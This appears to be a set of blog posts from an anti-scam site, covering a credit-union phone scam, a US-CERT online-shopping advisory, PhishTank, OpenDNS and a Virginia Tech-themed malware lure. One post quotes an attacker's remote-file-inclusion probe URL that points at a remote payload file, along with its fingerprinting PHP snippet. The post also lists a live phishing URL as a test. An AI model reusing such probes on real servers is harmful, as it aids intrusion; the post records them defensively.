Social engineering is an approach used to gain unauthorized access to or acquisition of information assets. This approach relies on misrepresentation and the trusting nature of individuals, and is often carried out through the use of phishing telephone calls or email.
A phishing telephone call or phishing email may sound or look as though it comes from an organization you do business with, such as a bank or government entity, but they are generally from a scammer trying to obtain your personal information under false pretenses.

This particular scam is being carried out by telephone as follows:

An individual leaves a message on an employee’s work phone number, stating they are with the Golden 1 Credit Union. In this scam, the message states that the targeted person’s credit and/or debit card has been temporarily suspended and instructs them to push “1” to reach security. Do not push “1”. If you push “1”, a second recording will ask you put your card number. DO NOT PUT IN YOUR CARD NUMBER!!!!

The following are general practices to avoid becoming a victim of these types of scams:

• Do not respond to unsolicited (spam) e-mail. Simply delete it.
• Be skeptical of individuals representing themselves as officials soliciting personal information via e-mail, telephone or other means.
• Do not click on links contained within an unsolicited e-mail.
• Be cautious of e-mail claiming to contain pictures in attached files, as the files may contain viruses. Only open attachments from known senders.
• Validate the legitimacy of the organization by directly accessing the organization’s website rather than following an alleged link to the site.
• Do not provide personal or financial information to anyone who solicits information.

The Golden 1 Credit Union has been made aware of this scam. Additional information from Golden 1 Credit Union regarding fraud is available on their website at: https://www.golden1.com/privacysecurity/phonefraud.aspx

There are a lot of smart people out there who know way too much about computers and software and stuff, like this guy: ‘Perishable Press‘. So, can someone clever please tell me why this simple url hangs up a bunch of seemingly dissimilar web servers:

http://www.microsoft.com/errors.php?error=http://abirdseyeviewof.com/files/image/id1.txt?

My banana was once part of a bunch very similar to this one

Here’s the deal – when someone asks for a webpage on Scamdex that doesn’t exist, it shoots me a quick email to tell me about it. That way I can see if anything is broken and if anyone is trying to hack my site. My normal response to obviousl hack-attempts  is to block the IP address or use .htaccess rewrite rules to send them to an oh-so-friendly  ‘go away page‘ .

In this case, the URL carries a payload that is itself a  link to a file on a remote site, which it hopes I will allow to run on my server. The code (which is reproduced in it’s entirety here) will, if allowed to run, return the word ‘FeelCoMz’ to the ’sKriptKiDee’, aka ‘Wanker’  on the sending end.

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

So… it didn’t work, I trapped it and it raised a red flag, but then why, when I try the URL does it make a browser stand blinking like a deer in the proverbial headlights for 120 seconds before falling flat on it’s back?

Analyzing the url gets me to this reduction of required parts:

* any .php file path.
* any query string, that contains a ‘http://’ in
* must have a file extension such as txt, gif, png etc.
* must have the trailing ‘?’

will cause the same problem on an awful lot of famous name servers. For example, including mine: scamdex.com, uniplex.com, google.com, microsoft.com, amazon.com etc etc.

For example, in the following link, everything except ‘www.amazon.com’ is made up

http://www.amazon.com/a.php?b=http://c.gif?

but it still exhibits the same behaviour – WTF is going on?

and why, oh why can’t I detect it in my .htaccess file?

First person to:
1. Tell me why it’s happening.
2. Tell me how to detect it and stop it happening.
3. Tell me why Google hates me.

gets a really major serious prize like my personal desktop banana, or this lovely (chipped) coffee mug with the name of a football club I don’t support on it – or even my second best earphones.

Good luck!

_________________________________

Still no replies and it’s still happening…. where have all the gurus gone?

In my infrequent callouts to other websites that  (like Scamdex) were  created out of the blind fury experinced by seeing bad people taking money from good people, I have another site for you to take notice of.

But first, a recap:

When Scamdex started in 2004, there were very few sites about scams and Internet fraud; we felt there was a need to educate people and, using the power of Search Engines, set out to make it easy to check on emails and websites.

Since then, the field has  grown – lots of Government-funded sites have sprung up, large Internet organizations  have (finally) acknowledged that fraud does happen and now devote precious pages to warning their customers  “it’s not our fault, please don’t bother trying to sue us” “there are unscrupulous people out there so please don’t use Western Union to but Laptops from Nigeria” etc…

But still Scamdex and the many other privately run websites continue in their (often one-manned) struggle against the odds and so to one of these: ‘BobBear’

Bob Bear Website Logo

Bobbear.co.uk is a voluntary, non-profit site dedicated to providing information on fake companies offering part-time, work from home job scams, in particular money mule or money transfer fraud, aka ‘payment transfer agent’ scams and the related reshipping fraud or ‘parcels agent’ scams. They also provide victim advice and support. If you receive a suspect spam offering you a job or find a website offering fraud jobs then please send them (and us) a copy.

Please support them – you know it makes sense!

This is a notice that you should send to your family and friends, (especially the ’silver surfers’) and maybe even stick on the ‘fridge door and on the side of your monitor, just so you remember. Help make this a Scam-Free Christmas!

US-CERT Issues Warning about Cyber Shopping

Online shopping has become a popular way to purchase items without the hassles of traffic and crowds. However, the Internet has unique risks, so it is important to take steps to protect yourself when shopping online.

Why do online shoppers have to take special precautions?

The Internet offers a convenience that is not available from any other shopping outlet. From the comfort of your home, you can search for items from countless vendors, compare prices with a few simple mouse clicks, and make purchases without waiting in line. However, the Internet is also convenient for attackers, giving them multiple ways to access the personal and financial information of unsuspecting shoppers.  Attackers who are able to obtain this information may use it for their own financial gain, either by making purchases themselves or by selling the information to someone else.

How do attackers target online shoppers?

There are three common ways that attackers can take advantage of online shoppers:

• Targeting vulnerable computers – If you do not take steps to protect your computer from viruses or other malicious code, an attacker may be able to gain access to your computer and all of the information on it. It is also important for vendors to protect their computers to prevent attackers from accessing customer databases.
• Creating fraudulent sites and email messages – Unlike traditional shopping, where you know that a store is actually the store it claims to be, attackers can create malicious web sites that mimic legitimate ones or create email messages that appear to have been sent from a legitimate source. Charities may also be misrepresented in this way, especially after natural disasters or during holiday seasons. Attackers create these malicious sites and email messages to try to convince you to supply personal and financial information.
• Intercepting insecure transactions – If a vendor does not use encryption, an attacker may be able to intercept your information as it is being transmitted.

How can you protect yourself?

• Use and maintain anti-virus software, a firewall, and anti-spyware software – Protect yourself against viruses and Trojan horses that may steal or modify the data on your own computer and leave you vulnerable by using anti-virus software and a firewall (see Understanding Anti-Virus Software and Understanding Firewalls for more information). Make sure to keep your virus definitions up to date. Spyware or adware hidden in software programs may also give attackers access to your data, so use a legitimate anti-spyware program to scan your computer and remove any of these files.
• Keep software, particularly your web browser, up to date – Install software patches so that attackers cannot take advantage of known problems or vulnerabilities. Many operating systems offer automatic updates. If this option is available, you should enable it.
• Evaluate your software’s settings – The default settings of most software enable all available functionality. However, attackers may be able to take advantage of this functionality to access your computer. It is especially important to check the settings for software that connects to the Internet (browsers, email clients, etc.). Apply the highest level of security available that still gives you the functionality you need.
• Do business with reputable vendors – Before providing any personal or financial information, make sure that you are interacting with a reputable, established vendor. Some attackers may try to trick you by creating malicious web sites that appear to be legitimate, so you should verify the legitimacy before supplying any information . Locate and note phone numbers and physical addresses of vendors in case there is a problem with your transaction or your bill.
• Take advantage of security features – Passwords and other security features add layers of protection if used appropriately.
• Be wary of emails requesting information – Attackers may attempt to gather information by sending emails requesting that you confirm purchase or account information . Legitimate businesses will not solicit this type of information through email.
• Check privacy policies – Before providing personal or financial information, check the web site’s privacy policy. Make sure you understand how your information will be stored and used.
• Make sure your information is being encrypted – Many sites use SSL, or secure sockets layer, to encrypt information. Indications that your information will be encrypted include a URL that begins with “https:” instead of “http:” and a lock icon in the bottom right corner of the window.
• Use a credit card – Unlike debit cards, credit cards may have a limit on the monetary amount you will be responsible for paying if your information is stolen and used by someone else. You can
  further minimize damage by using a single credit card with a low credit line for all of your online purchases.
• Check your statements – Keep a record of your purchases and copies of confirmation pages, and compare them to your bank statements. If there is a discrepancy, report it immediately.

This document can also be found at  on the US-CERT Website, HERE

PhishTank.com – Anti Phishing Website!

Here’s the thing – from now on, ANY TIME you get an email that sends you to a PayPal/Bank of America/Google Adsense/eBay/your-bank-name site that you know is a scam site [that just wants your login/password/credit card/bank details] – immediately report it to PhishTank.com.

They are the database that many browsers and security firewalls automatically use – within seconds, millions of people are protected!.  To see if YOUR browser/network is using this service, try this url picked at random from Phishtank’s database this morning – http://bloccatoinlinea.net/

I use Firefox mainly and for me, I get a nice message like this:

Firefox Warns about visiting a Phishing Site

If you get ’straight through’ without any warnings then you need to seriously consider upgrading your browser to FireFox 3 or even the spiffy new Google Chrome.

Is it worth the effort of reporting it?

Trust  me , this isn’t the same as sending an email to abuse@hotwebsites-r-us.cn and hoping that something will happen – this is the real deal – Your submission goes into the Phishing database, people are invited to check your submission and vote on it (for or against) and (assuming it’s approved) one more scam website is defeated!

Once you’ve done it once, you might like to signup and join the band of selfless individuals who monitor, verify and discuss these things (look out for ’scamdex’!).

Good for your sense of moral outrage and good for the general public – help stamp out Phishing – go to Phishtank.com and sign up NOW!

The DNS Route to Scam Protection Online.

When you type in ‘www.scammingsite.com’ on your browser, a lookup is performed to translate the domain name into a unique address (IP Address) that all networked computers understand and which contains the path to the right server.


Your ISP will have given you two longish ‘numbers-separated-by-dots’ (eg. 207.44.123.28) to type in to your Network Settings. These are the Domain Name Servers (DNS) that your computer will use whenever you ask to go to a domain name.

Right? Well, never mind, just trust me on this one.

Wouldn’t it be great if, when you did the lookup/translate part, the result was filtered for Scams/Profanity/Pornography/Crime/Violence etc etc?

Well, by changing the DNS servers you use, you can have this great feature – for free, I may ad – and you (and your children/employees) can surf a little easier. No software to download, no subscriptions, no spam – it couldn’t be easier. Free, simple to do, free, great protection …. what more can I say other than if you don’t believe me, Click this button to find out why you need to change your DNS servers NOW!

(or, you can just change your DNS servers to 208.67.222.222 and 208.67.220.220 and get on with your life)

BTW, the same people who run OpenDNS.com also run an Anti-Phishing site called, amusingly, PhishTank

To those people who want to see what happens when a madman shoots 32 other students, there is a sting out there just for them. Email Spam promises camera phone footage of the Virginia Tech tragedy, but the website just tries to grab your bank details instead. IT security and control firm Sophos has warned individuals of a social engineering phishing campaign that attempts to capitalize on the tragedy at Virginia Tech. Spam messages teasing camera phone footage of the Virginia Tech shootings have begun flooding inboxes worldwide. These messages, however, are infected with malware and could pose major problems if clicked through.

Discovered yesterday, the link within the spam messages points viewers to a file entitled TERROR_EM_VIRGINIA.scr. If downloaded, the link installs a banking Trojan on the users computer system which can be used by cybercriminals to steal passwords, user names and account numbers.